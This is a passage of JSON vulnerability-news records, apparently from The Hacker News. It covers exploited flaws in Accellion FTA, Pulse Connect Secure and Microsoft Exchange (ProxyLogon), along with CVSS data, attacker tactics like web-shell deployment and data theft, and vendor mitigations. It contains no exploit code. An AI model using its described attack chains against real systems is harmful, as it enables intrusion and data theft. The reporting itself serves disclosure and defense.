Danaher.\n\n[](<https://thehackernews.com/images/-Q8lPq3Q_3Ak/YDSqVE_QgnI/AAAAAAAAB24/rXciWGBxiEoUYoFwkxwNK4iI-SawG1jkACLcBGAsYHQ/s0/data-theft.jpg>)\n\nFollowing the slew of attacks, Accellion has patched four FTA vulnerabilities 
that were known to be exploited by the threat actors, in addition to incorporating new monitoring and alerting capabilities to flag any suspicious behavior. The flaws are as follows -\n\n * CVE-2021-27101 - SQL injection via a crafted Host header\n * CVE-2021-27102 - OS command execution via a local web service call\n * CVE-2021-27103 - SSRF via a crafted POST request\n * CVE-2021-27104 - OS command execution via a crafted POST request\n\nFireEye's Mandiant threat intelligence team, which is leading the incident response efforts, is [tracking](<https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html>) the follow-on extortion scheme under a separate threat cluster it calls UNC2582 despite \"compelling\" overlaps identified between the two sets of malicious activities and previous attacks carried out by a financially motivated hacking group dubbed FIN11.\n\n\"Many of the organizations compromised by UNC2546 were previously targeted by FIN11,\" FireEye said. 
\"Some UNC2582 extortion emails observed in January 2021 were sent from IP addresses and/or email accounts used by FIN11 in multiple phishing campaigns between August and December 2020.\"\n\nOnce installed, the DEWMODE web shell was leveraged to download files from compromised FTA instances, leading to the victims receiving extortion emails claiming to be from the \"CLOP ransomware team\" several weeks later.\n\nLack of reply in a timely manner would result in additional emails sent to a wider group of recipients in the victim organization as well as its partners containing links to the stolen data, the researchers detailed.\n\nBesides urging its FTA customers to migrate to kiteworks, Accellion [said](<https://www.accellion.com/company/press-releases/accellion-provides-update-to-fta-security-incident-following-mandiants-preliminary-findings/>) fewer than 100 out of 300 total FTA clients were victims of the attack and that less than 25 appear to have suffered \"significant\" data theft.\n\nThe development comes after grocery chain Kroger [disclosed](<https://www.kroger.com/i/accellion-incident>) last week that HR data, pharmacy records, and money services records belonging to some customers might have been compromised as a result of the Accellion incident.\n\nThen earlier today, Transport for New South Wales (TfNSW) became the latest entity to confirm that it had been impacted by the worldwide Accellion data breach.\n\n\"The Accellion system was widely used to share and store files by organisations around the world, including Transport for NSW,\" the Australian agency [said](<https://www.transport.nsw.gov.au/news-and-events/articles/transport-for-nsw-impacted-by-worldwide-accellion-data-breach>). \"Before the attack on Accellion servers was interrupted, some Transport for NSW information was taken.\"\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-23T07:18:00", "type": "thn", "title": "Hackers Exploit Accellion Zero-Days in Recent Data Theft and Extortion Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-02-23T08:26:03", "id": "THN:43A16BBDCD3B020E360EE37C48B44088", "href": "https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:01", "description": "Ivanti, the company behind Pulse Secure VPN appliances, has published a security advisory for a high severity vulnerability that may 
allow an authenticated remote attacker to execute arbitrary code with elevated privileges.\n\n\"Buffer Overflow in Windows File Resource Profiles in 9.X allows a remote authenticated user with privileges to browse SMB shares to execute arbitrary code as the root user,\" the company [said](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44800>) in an alert published on May 14. \"As of version 9.1R3, this permission is not enabled by default.\"\n\nThe flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway's ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack.\n\n\"When specifying a long server name for some SMB operations, the 'smbclt' application may crash due to either a stack buffer overflow or a heap buffer overflow, depending on how long of a server name is specified,\" CERT/CC [detailed](<https://kb.cert.org/vuls/id/667933>) in a vulnerability note published on Monday, adding it was able to trigger the vulnerable code by targeting the CGI script '/dana/fb/smb/wnf.cgi.'\n\nPulse Secure customers are recommended to upgrade to PCS Server version 9.1R.11.5 when it becomes available. 
In the interim, Ivanti has published a workaround file ('Workaround-2105.xml') that can be imported to disable the Windows File Share Browser feature by adding the vulnerable URL endpoints to a blocklist and thus activate necessary mitigations to protect against this vulnerability.\n\nIt bears noting that users running PCS versions 9.1R11.3 or below would need to import a different file named '[Workaround-2104.xml,](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/?kA23Z000000boUWSAY>)' necessitating that the PCS system is running 9.1R11.4 before applying the safeguards in 'Workaround-2105.xml.'\n\nWhile Ivanti has recommended turning off Windows File Browser on the Admin UI by disabling the option 'Files, Window [sic]' for specific user roles, CERT/CC found the steps were inadequate to protect against the flaw during its testing. \n\n\"The vulnerable CGI endpoints are still reachable in ways that will trigger the 'smbclt' application to crash, regardless of whether the 'Files, Windows' user role is enabled or not,\" it noted.\n\n\"An attacker would need a valid DSID and 'xsauth' value from an authenticated user to successfully reach the vulnerable code on a PCS server that has an open Windows File Access policy.\"\n\nThe disclosure of a new flaw arrives weeks after the Utah-based IT software company [patched](<https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html>) multiple critical security vulnerabilities in Pulse Connect Secure products, including CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900, the first of which was found to be actively [exploited in the wild](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) by at least two different threat actors.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-25T07:37:00", "type": "thn", "title": "New High-Severity Vulnerability Reported in Pulse Connect Secure VPN", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22908"], "modified": "2021-05-25T07:37:19", "id": "THN:FA7EFA3A74BF3490AD84EA169EA6C4CA", "href": "https://thehackernews.com/2021/05/new-high-severity-vulnerability.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:03", "description": "Enterprise cloud security firm **Qualys** has become the latest victim to join a long list of entities to have suffered a data breach after zero-day 
vulnerabilities in its Accellion File Transfer Appliance (FTA) server were exploited to steal sensitive business documents.\n\nAs proof of access to the data, the cybercriminals behind the recent hacks targeting Accellion FTA servers have shared screenshots of files belonging to the company's customers on a publicly accessible data leak website operated by the CLOP ransomware gang.\n\nConfirming the incident, Qualys Chief Information Security Officer Ben Carr [said](<https://blog.qualys.com/vulnerabilities-research/2021/03/03/qualys-update-on-accellion-fta-security-incident>) a detailed probe \"identified unauthorized access to files hosted on the Accellion FTA server\" located in a DMZ (aka [demilitarized zone](<https://en.wikipedia.org/wiki/DMZ_%28computing%29>)) environment that's segregated from the rest of the internal network.\n\n\"Based on this investigation, we immediately notified the limited number of customers impacted by this unauthorized access,\" Carr added. \"The investigation confirmed that the unauthorized access was limited to the FTA server and did not impact any services provided or access to customer data hosted by the Qualys Cloud Platform.\"\n\nLast month, FireEye's Mandiant threat intelligence team [disclosed](<https://thehackernews.com/2021/02/hackers-exploit-accellion-zero-days-in.html>) details of four zero-day flaws in the FTA application that were exploited by threat actors to mount a wide-ranging data theft and extortion campaign, which involved deploying a web shell called DEWMODE on target networks to exfiltrate sensitive data, followed by sending extortion emails to threaten victims into paying bitcoin ransoms, failing which the stolen data was posted on the data leak site.\n\n[](<https://thehackernews.com/images/-N0_0EMgMeSk/YECsZm15i_I/AAAAAAAAB8o/LpcUVTcjzyw22UE7TTrWXNzJGVpnzURugCLcBGAsYHQ/s0/data.jpg>)\n\nWhile two of the flaws (CVE-2021-27101 and CVE-2021-27104) were 
[addressed](<https://thehackernews.com/2021/02/data-breach-exposes-16-million-jobless.html>) by Accellion on December 20, 2020, the other two vulnerabilities (CVE-2021-27102 and CVE-2021-27103) were identified earlier this year and fixed on January 25.\n\nQualys said it received an \"integrity alert\" suggesting a possible compromise on December 24, two days after it applied the initial hotfix on December 22. The company didn't say if it received extortion messages in the wake of the breach, but said an investigation into the incident is ongoing.\n\n\"The exploited vulnerabilities were of critical severity because they were subject to exploitation via unauthenticated remote code execution,\" Mandiant [said](<https://www.accellion.com/company/security-updates/mandiant-issues-final-report-regarding-accellion-fta-attack/>) in a security assessment of the FTA software published earlier this week.\n\nAdditionally, Mandiant's source code analysis uncovered two more previously unknown security flaws in the FTA software, both of which have been rectified in a patch (version 9.12.444) released on March 1 \u2014\n\n * **CVE-2021-27730**: An argument injection vulnerability (CVSS score 6.6) accessible only to authenticated users with administrative privileges, and\n * **CVE-2021-27731**: A stored cross-site scripting flaw (CVSS score 8.1) accessible only to regular authenticated users\n\nThe FireEye-owned subsidiary is tracking the exploitation activity and the follow-on extortion scheme under two separate threat clusters it calls UNC2546 and UNC2582, respectively, with overlaps identified between the two groups and previous attacks carried out by a financially motivated threat actor dubbed FIN11. But it is still unclear what connection, if any, the two clusters may have with the operators of Clop ransomware.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-04T09:49:00", "type": "thn", "title": "Extortion Gang Breaches Cybersecurity Firm Qualys Using Accellion Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27730", "CVE-2021-27731"], "modified": "2021-03-08T07:30:27", "id": "THN:582576397E2C98200C7C952401392B5B", "href": "https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:04", "description": "Microsoft has [released emergency 
patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server>) to address four previously undisclosed security flaws in Exchange Server that it says are being actively exploited by a new Chinese state-sponsored threat actor with the goal of perpetrating data theft.\n\nDescribing the attacks as \"limited and targeted,\" Microsoft Threat Intelligence Center (MSTIC) said the adversary used these vulnerabilities to access on-premises Exchange servers, in turn granting access to email accounts and paving the way for the installation of additional malware to facilitate long-term access to victim environments.\n\nThe tech giant primarily attributed the campaign with high confidence to a threat actor it calls HAFNIUM, a state-sponsored hacker collective operating out of China, although it suspects other groups may also be involved.\n\nDiscussing the tactics, techniques, and procedures (TTPs) of the group for the first time, Microsoft paints HAFNIUM as a \"highly skilled and sophisticated actor\" that mainly singles out entities in the U.S. for exfiltrating sensitive information from an array of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks and NGOs.\n\nHAFNIUM is believed to orchestrate its attacks by leveraging leased virtual private servers in the U.S. in an attempt to cloak its malicious activity.\n\nThe three-stage attack involves gaining access to an Exchange Server either with stolen passwords or by using previously undiscovered vulnerabilities, followed by deploying a web shell to control the compromised server remotely. 
The last link in the attack chain makes use of remote access to plunder mailboxes from an organization's network and export the collected data to file sharing sites like MEGA.\n\nTo achieve this, as many as [four zero-day vulnerabilities](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) discovered by researchers from Volexity, Dubex and Devcore are used as part of the attack chain \u2014\n\n * [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>): A server-side request forgery (SSRF) vulnerability in Exchange Server\n * [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>): An insecure deserialization vulnerability in the Unified Messaging service\n * [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>): A post-authentication arbitrary file write vulnerability in Exchange, and\n * [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): A post-authentication arbitrary file write vulnerability in Exchange\n\nAlthough the vulnerabilities impact Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019, Microsoft said it's updating Exchange Server 2010 for \"Defense in Depth\" purposes.\n\nFurthermore, since the initial attack requires an untrusted connection to Exchange server port 443, the company notes that organizations can reduce their exposure (though not fix the flaws) by restricting untrusted connections or by placing the Exchange server behind a VPN so it cannot be reached directly from the internet. That only blocks the unauthenticated first step of the chain; an attacker who already holds valid credentials or a foothold can still trigger the post-authentication bugs.\n\nMicrosoft, besides stressing that the exploits were not connected to the SolarWinds-related breaches, said it has briefed appropriate U.S. government agencies about the new wave of attacks. 
But the company didn't elaborate on how many organizations were targeted and whether the attacks were successful.\n\nStating that the intrusion campaigns appeared to have started around January 6, 2021, Volexity cautioned it has detected active in-the-wild exploitation of multiple Microsoft Exchange vulnerabilities used to steal email and compromise networks.\n\n\"While the attackers appear to have initially flown largely under the radar by simply stealing emails, they recently pivoted to launching exploits to gain a foothold,\" Volexity researchers Josh Grunzweig, Matthew Meltzer, Sean Koessel, Steven Adair, and Thomas Lancaster [explained](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) in a write-up.\n\n\"From Volexity's perspective, this exploitation appears to involve multiple operators using a wide variety of tools and methods for dumping credentials, moving laterally, and further backdooring systems.\"\n\nAside from the patches, Microsoft Senior Threat Intelligence Analyst Kevin Beaumont has also [created](<https://twitter.com/GossiTheDog/status/1366858907671552005>) an [Nmap NSE script](<https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse>) that can be used to scan a network for potentially vulnerable Microsoft Exchange servers.\n\nGiven the severity of the flaws, it's no surprise that patches have been rolled out a week ahead of the company's Patch Tuesday schedule, which is typically reserved for the second Tuesday of each month. 
Customers using a vulnerable version of Exchange Server are advised to install the updates immediately to thwart these attacks.\n\n\"Even though we've worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems,\" Microsoft's Corporate Vice President of Customer Security, Tom Burt, [said](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>). \"Promptly applying today's patches is the best protection against this attack.\"\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T07:28:00", "type": "thn", "title": "URGENT \u2014 4 Actively Exploited 0-Day Flaws Found in Microsoft Exchange", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", 
"CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T07:56:35", "id": "THN:9AB21B61AFE09D4EEF533179D0907C03", "href": "https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:04", "description": "Microsoft on Friday warned of active attacks exploiting [unpatched Exchange Servers](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) carried out by multiple threat actors, as the hacking campaign is believed to have infected tens of thousands of businesses and government entities in the U.S., Asia, and Europe.\n\nThe company [said](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \"it continues to see increased use of these vulnerabilities in attacks targeting unpatched systems by multiple malicious actors beyond HAFNIUM,\" signaling that the breaches are no longer \"limited and targeted\" as was previously deemed.\n\nAccording to independent cybersecurity journalist [Brian Krebs](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>), at least 30,000 entities across the U.S. 
\u2014 mainly small businesses, towns, cities, and local governments \u2014 have been compromised by an \"unusually aggressive\" Chinese group that has set its sights on stealing emails from victim organizations by exploiting previously undisclosed flaws in Exchange Server.\n\nVictims are also being reported from outside the U.S., with email systems belonging to businesses in [Norway](<https://nsm.no/aktuelt/oppdater-microsoft-exchange-snarest>), the [Czech Republic](<https://nukib.cz/cs/infoservis/hrozby/1692-vyjadreni-k-aktualni-situaci/>) and the [Netherlands](<https://www.ncsc.nl/actueel/nieuws/2021/maart/8/40-nl-microsoft-exchange-servers-nog-steeds-kwetsbaar>) impacted in a series of hacking incidents abusing the vulnerabilities. The Norwegian National Security Authority said it has implemented a vulnerability scan of IP addresses in the country to identify vulnerable Exchange servers and \"continuously notify these companies.\"\n\nThe colossal scale of the ongoing offensive against Microsoft's email servers also eclipses the [SolarWinds hacking spree](<https://thehackernews.com/2020/12/nearly-18000-solarwinds-customers.html>) that came to light last December, which is said to have targeted as many as 18,000 customers of the IT management tools provider. But as it was with the SolarWinds hack, the attackers are likely to have only gone after high-value targets based on an initial reconnaissance of the victim machines.\n\n### Unpatched Exchange Servers at Risk of Exploitation\n\nSuccessful [exploitation of the flaws](<https://unit42.paloaltonetworks.com/microsoft-exchange-server-vulnerabilities/>) allows adversaries to break into Microsoft Exchange Servers in target environments and then install unauthorized web-based backdoors (web shells) that give them long-term access. 
With multiple threat actors leveraging these zero-day vulnerabilities, the post-exploitation activities are expected to differ from one group to the other based on their motives.\n\nChief among the vulnerabilities is CVE-2021-26855, also called \"ProxyLogon\" (no connection to ZeroLogon), a server-side request forgery that lets an unauthenticated attacker bypass authentication on an on-premises Microsoft Exchange Server that accepts untrusted connections from an external source on port 443. With that foothold, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, which would otherwise require authentication, can be exploited to write arbitrary files or run code on the server, typically to drop a web shell that gives the attacker remote access.\n\nTaiwanese cybersecurity firm Devcore, which began an internal audit of Exchange Server security in October last year, [noted in a timeline](<https://proxylogon.com/>) that it discovered both CVE-2021-26855 and CVE-2021-27065 within a 10-day period between December 10-20, 2020. After chaining these bugs into a workable pre-authentication RCE exploit, the company said it reported the issue to Microsoft on January 5, 2021, suggesting that Microsoft had almost two months to release a fix.\n\nThe four security issues in question were eventually [patched by Microsoft](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>) as part of an emergency out-of-band security update last Tuesday, while warning that \"many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\"\n\nThe fact that Microsoft also patched Exchange Server 2010 suggests that the vulnerable code has been present for more than ten years, although Microsoft described the 2010 update as a \"Defense in Depth\" measure rather than a fix for an affected version.\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA), which released an [emergency directive](<https://thehackernews.com/2021/03/cisa-issues-emergency-directive-on-in.html>) warning of \"active exploitation\" of the vulnerabilities, urged government agencies running vulnerable versions of Exchange Server to either update the software or disconnect the products from their networks.\n\n\"CISA is aware of widespread domestic and international exploitation of Microsoft Exchange Server vulnerabilities and urges scanning Exchange Server logs with Microsoft's IoC detection tool to help determine compromise,\" the agency [tweeted](<https://twitter.com/USCERT_gov/status/1368216461571919877>) on March 6.\n\nIt's worth noting that merely installing the patches issued by Microsoft would have no effect on servers that have already been backdoored. Organizations that have been breached to deploy the web shell and other post-exploitation tools continue to remain at risk of future compromise until the artifacts are completely rooted out from their networks.\n\n### Multiple Clusters Spotted\n\nFireEye's Mandiant threat intelligence team [said](<https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html>) it \"observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment\" since the start of the year. Cybersecurity firm Volexity, one of the firms credited with discovering the flaws, said the intrusion campaigns appeared to have started around January 6, 2021.\n\nNot much is known about the identities of the attackers, except that Microsoft has primarily attributed the exploits with high confidence to a group it calls Hafnium, a skilled government-backed group operating out of China. 
Mandiant is tracking the intrusion activity in three clusters, UNC2639, UNC2640, and UNC2643, adding it expects the number to increase as more attacks are detected.\n\nIn a statement to [Reuters](<https://www.reuters.com/article/us-usa-cyber-microsoft/more-than-20000-u-s-organizations-compromised-through-microsoft-flaw-source-idUSKBN2AX23U>), a Chinese government spokesman denied the country was behind the intrusions.\n\n\"There are at least five different clusters of activity that appear to be exploiting the vulnerabilities,\" [said](<https://twitter.com/redcanary/status/1368289931970322433>) Katie Nickels, director of threat intelligence at Red Canary, while noting the differences in the techniques and infrastructure from that of the Hafnium actor.\n\nIn one particular instance, the cybersecurity firm [observed](<https://twitter.com/redcanary/status/1367935292724948992>) that some customers' compromised Exchange servers had been seeded with cryptomining malware called [DLTminer](<https://www.carbonblack.com/blog/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>), which Carbon Black documented in 2019.\n\n\"One possibility is that Hafnium adversaries shared or sold exploit code, resulting in other groups being able to exploit these vulnerabilities,\" Nickels said. \"Another is that adversaries could have reverse engineered the patches released by Microsoft to independently figure out how to exploit the vulnerabilities.\"\n\n### Microsoft Issues Mitigation Guidance\n\nAside from rolling out fixes, Microsoft has published new alternative mitigation guidance to help Exchange customers who need more time to patch their deployments, in addition to pushing out a new update for the Microsoft Safety Scanner (MSERT) tool to detect web shells and [releasing a script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for checking HAFNIUM indicators of compromise. 
The mitigation guidance can be found [here](<https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/>).\n\n\"These vulnerabilities are significant and need to be taken seriously,\" Mat Gangwer, senior director of managed threat response at Sophos said. \"They allow attackers to remotely execute commands on these servers without the need for credentials, and any threat actor could potentially abuse them.\"\n\n\"The broad installation of Exchange and its exposure to the internet mean that many organizations running an on-premises Exchange server could be at risk,\" Gangwer added.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-08T10:15:00", "type": "thn", "title": "Microsoft Exchange Cyber Attack \u2014 What Do We Know So Far?", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", 
"CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-10T08:44:19", "id": "THN:9DB02C3E080318D681A9B33C2EFA8B73", "href": "https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:16", "description": "Ivanti, the company behind Pulse Secure VPN appliances, has released a security patch to remediate a critical security vulnerability that was found being actively exploited in the wild by at least two different threat actors.\n\nTracked as [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>) (CVSS score 10), the flaw concerns \"multiple use after free\" issues in Pulse Connect Secure that could allow a remote unauthenticated attacker to execute arbitrary code and take control of the affected system. All Pulse Connect Secure versions prior to 9.1R11.4 are impacted.\n\nThe flaw came to light on April 20 after FireEye [disclosed](<https://thehackernews.com/2021/04/warning-hackers-exploit-unpatched-pulse.html>) a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in the remote access solution to bypass multi-factor authentication protections and breach enterprise networks.\n\nThe development prompted the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) to issue an [Emergency Directive](<https://www.cisa.gov/news/2021/04/20/cisa-issues-emergency-directive-requiring-federal-agencies-check-pulse-connect>) urging federal agencies and civilian departments to mitigate any anomalous activity or active exploitation detected on their networks.\n\nFollowing an investigation conducted in conjunction with FireEye Mandiant, Ivanti said the attacks were observed on a \"very limited number\" of customer systems. FireEye is tracking the activity under two separate clusters, UNC2630 and UNC2717, citing differences in the malicious web shells that were dropped on the compromised devices.\n\n\"As sophisticated threat actors continue their attacks on U.S. businesses and government agencies, we will continue to work with our customers, the broader security industry, law enforcement and government agencies to mitigate these threats,\" the Utah-based software firm [said](<https://blog.pulsesecure.net/pulse-connect-secure-patch-availability-sa44784/>).\n\n\"Companywide we are making significant investments to enhance our overall cybersecurity posture, including a more broad implementation of secure application development standards.\"\n\nPulse Secure customers are advised to move quickly to apply the update to ensure they are protected. Because applying the patch does not remove web shells already planted on a device, the company has also released a [Pulse Connect Secure Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to check for signs of compromise and identify malicious activity on their systems.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-04T07:52:00", "type": "thn", "title": "Critical Patch Out for Critical Pulse Secure VPN 0-Day Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2021-05-04T08:21:24", "id": "THN:4F47385B2D66DCA6F584F23C5F1AE0D0", "href": "https://thehackernews.com/2021/05/critical-patch-out-for-month-old-pulse.html", "cvss": {"score": 7.5, "vector": 